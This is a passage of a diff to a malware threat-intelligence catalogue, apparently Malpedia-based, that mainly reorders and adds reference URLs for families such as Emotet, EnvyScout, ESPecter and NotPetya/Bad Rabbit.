"https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128", + "https://persianov.net/emotet-malware-analysis-part-1", + "https://www.infosecurity-magazine.com/blogs/a-rundown-of-the-emotet-malware/", + "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/", + "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return", + "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", + "https://de.darktrace.com/blog/emotet-resurgence-cross-industry-campaign-analysis", + "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", + "https://muha2xmad.github.io/unpacking/emotet-part-1/", + "https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/", + "https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code", + "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://www.youtube.com/watch?v=q8of74upT_g", + "https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/", + "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", + "https://www.bleepingcomputer.com/news/security/emotet-malware-attacks-return-after-three-month-break/", + "https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware", + "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html", "https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/", + "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", + "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", + "https://blogs.vmware.com/security/2022/08/how-to-replicate-emotet-lateral-movement.html", + "https://persianov.net/emotet-malware-analysis-part-2", + "https://intezer.com/blog/research/how-hackers-use-binary-padding-to-outsmart-sandboxes/", + "https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams", + "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/", + "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", + "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html", + "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", + "https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware", + "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://unit42.paloaltonetworks.com/c2-traffic/", + "https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://cyber.wtf/2022/03/23/what-the-packer/", + "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes", + "https://twitter.com/ContiLeaks/status/1498614197202079745", + "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", + "https://www.youtube.com/watch?v=_BLOmClsSpc", + "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one", + "https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/", + "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", + "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", + "https://experience.mandiant.com/trending-evil-2/p/1", + "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html", + "https://www.tgsoft.it/files/report/download.asp?id=7481257469", + "https://www.anomali.com/blog/mummy-spiders-emotet-malware-is-back-after-a-year-hiatus-wizard-spiders-trickbot-observed-in-its-return", + "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", + "https://twitter.com/eduardfir/status/1461856030292422659", + "https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/", + "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", + "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office", + "https://blogs.vmware.com/security/2022/05/emotet-moves-to-64-bit-and-updates-its-loader.html", + "https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure", + "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html", + "https://feodotracker.abuse.ch/?filter=version_e", + "https://securelist.com/emotet-modules-and-recent-attacks/106290/", + "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/", + "https://blogs.vmware.com/security/2022/05/emotet-config-redux.html", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", + "https://blog.threatlab.info/malware-analysis-emotet-infection/", + "https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques", + "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html", + "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/", + "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html", + "https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5", + "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", + "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/", + "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69", + "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", + "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html", + "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://twitter.com/Cryptolaemus1/status/1516535343281025032", + "https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection", + "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/", + "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/", + "https://github.com/cecio/EMOTET-2020-Reversing", + "https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://adalogics.com/blog/the-state-of-advanced-code-injections", + "https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure", + "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/", + "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-modern-bank-heists-2020.pdf", + "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/", + "https://www.trendmicro.com/en_no/research/23/c/emotet-returns-now-adopts-binary-padding-for-evasion.html", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://web.archive.org/web/20211223100528/https://cloudsek.com/emotet-2-0-everything-you-need-to-know-about-the-new-variant-of-thbanking-trojan/", + "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return", + "https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html", + "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://www.lac.co.jp/lacwatch/people/20201106_002321.html", "https://cert.grnet.gr/en/blog/reverse-engineering-emotet/", - "https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware" + "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/", + "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", + "https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html", + "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://securelist.com/the-chronicles-of-emotet/99660/", + "https://community.riskiq.com/article/2cd1c003", + "https://team-cymru.com/blog/2021/01/27/taking-down-emotet/" ], "synonyms": [ "Geodo", @@ -23516,29 +24624,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", - "https://attack.mitre.org/groups/G0096", - "http://www.secureworks.com/research/threat-profiles/gold-burlap", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://unit42.paloaltonetworks.com/atoms/obscureserpens/", - "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.secureworks.com/research/threat-profiles/gold-heron", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/looking-over-the-nation-state-actors-shoulders.html", + "https://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.secureworks.com/research/threat-profiles/gold-ulrick", + "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", - "https://twitter.com/thor_scanner/status/992036762515050496", - "https://paper.seebug.org/1301/", - "https://www.secureworks.com/research/threat-profiles/gold-heron", - "http://www.secureworks.com/research/threat-profiles/gold-heron", - "https://redcanary.com/blog/getsystem-offsec/", - "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/looking-over-the-nation-state-actors-shoulders.html", - "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://attack.mitre.org/groups/G0096", "https://www.mandiant.com/media/12596/download", - "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "http://www.secureworks.com/research/threat-profiles/gold-heron", "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a", - "https://www.secureworks.com/research/threat-profiles/gold-ulrick" + "https://twitter.com/thor_scanner/status/992036762515050496", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "http://www.secureworks.com/research/threat-profiles/gold-burlap", + "https://redcanary.com/blog/getsystem-offsec/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://paper.seebug.org/1301/" ], "synonyms": [], "type": [] @@ -23564,13 +24672,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", - "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-palace", + "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://attack.mitre.org/groups/G0011", - "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", - "https://www.secureworks.com/research/threat-profiles/bronze-palace", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" ], "synonyms": [ @@ -23599,11 +24707,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.entropy", - "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/?cmp=30728", - "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/" + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/?cmp=30728", + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/" ], "synonyms": [], "type": [] @@ -23629,14 +24737,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.envyscout", - "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html", - "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf", - "https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/", - "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/", "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58", + "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine", "https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf", + "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html", "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/", - "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine" + "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/", + "https://cert.pl/posts/2023/04/kampania-szpiegowska-apt29/", + "https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/", + "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf" ], "synonyms": [ "ROOTSAW" @@ -23647,7 +24756,7 @@ "value": "EnvyScout" }, { - "description": "", + "description": "According to PCrisk, Epsilon is a ransomware-type program. This malware is designed to encrypt the data of infected systems in order to demand payment for decryption.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.epsilon_red", @@ -23685,16 +24794,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", + "https://laanwj.github.io/2016/09/01/tadaqueos.html", "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html", - "https://laanwj.github.io/2016/09/11/buzzdirection.html", "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", - "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/", - "https://laanwj.github.io/2016/08/28/feintcloud.html", - "https://laanwj.github.io/2016/09/01/tadaqueos.html", + "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", "https://laanwj.github.io/2016/08/22/blatsting.html", "https://laanwj.github.io/2016/09/17/seconddate-cnc.html", - "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html" + "https://laanwj.github.io/2016/08/28/feintcloud.html", + "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/", + "https://laanwj.github.io/2016/09/11/buzzdirection.html" ], "synonyms": [], "type": [] @@ -23707,10 +24816,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer", - "https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer", + "https://twitter.com/abuse_ch/status/1565290110572175361", "https://www.bleepingcomputer.com/news/security/new-erbium-password-stealing-malware-spreads-as-game-cracks-cheats/", - "https://twitter.com/sekoia_io/status/1577222282929311744", - "https://twitter.com/abuse_ch/status/1565290110572175361" + "https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer", + "https://twitter.com/sekoia_io/status/1577222282929311744" ], "synonyms": [], "type": [] @@ -23775,8 +24884,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.especter", - "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html", - "https://www.welivesecurity.com/2021/10/05/uefi-threats-moving-esp-introducing-especter-bootkit/" + "https://www.welivesecurity.com/2021/10/05/uefi-threats-moving-esp-introducing-especter-bootkit/", + "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html" ], "synonyms": [], "type": [] @@ -23801,78 +24910,79 @@ "value": "EternalRocks" }, { - "description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims’ computers, servers, or files preventing them from regaining access until a ransom—usually in Bitcoin—is paid.\r\n\r\n", + "description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims\u2019 computers, servers, or files preventing them from regaining access until a ransom\u2014usually in Bitcoin\u2014is paid.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", - "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", - "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://gvnshtn.com/maersk-me-notpetya/", - "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", - "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", - "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", - "https://medium.com/@Ilandu/petya-not-petya-ransomware-9619cbbb0786", - "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", - "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", - "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/", - "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "http://www.intezer.com/notpetya-returns-bad-rabbit/", - "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", - "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", - "https://securelist.com/from-blackenergy-to-expetr/78937/", - "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", - "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", - "https://www.secureworks.com/research/threat-profiles/iron-viking", - "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", - "https://securelist.com/bad-rabbit-ransomware/82851/", - "https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/", - "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", - "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://therecord.media/mondelez-and-zurich-reach-settlement-in-notpetya-cyberattack-insurance-suit/", - "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf", - "https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine", - "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/", - "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", - "https://attack.mitre.org/groups/G0034", + "https://www.riskiq.com/blog/labs/badrabbit/", + "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", + "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", + "http://www.intezer.com/notpetya-returns-bad-rabbit/", + "https://gvnshtn.com/maersk-me-notpetya/", + "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html", "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", + "https://www.atlanticcouncil.org/content-series/tech-at-the-leading-edge/the-russian-cyber-unit-that-hacks-targets-on-site/", + "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", + "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", + "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", - "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", + "https://securelist.com/bad-rabbit-ransomware/82851/", + "https://securelist.com/from-blackenergy-to-expetr/78937/", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf", + "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", + "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", + "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/", + "https://medium.com/@Ilandu/petya-not-petya-ransomware-9619cbbb0786", + "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", + "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", + "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html", "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", + "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "https://securelist.com/schroedingers-petya/78870/", + "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/", + "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", + "https://attack.mitre.org/groups/G0034", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", + "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukraine/78973/", + "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", "https://istari-global.com/spotlight/the-untold-story-of-notpetya/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back", - "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", - "https://www.riskiq.com/blog/labs/badrabbit/", - "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", - "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", - "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", + "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", - "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", - "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", - "https://www.atlanticcouncil.org/content-series/tech-at-the-leading-edge/the-russian-cyber-unit-that-hacks-targets-on-site/", - "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", - "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", - "https://securelist.com/schroedingers-petya/78870/", - "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", - "https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/", - 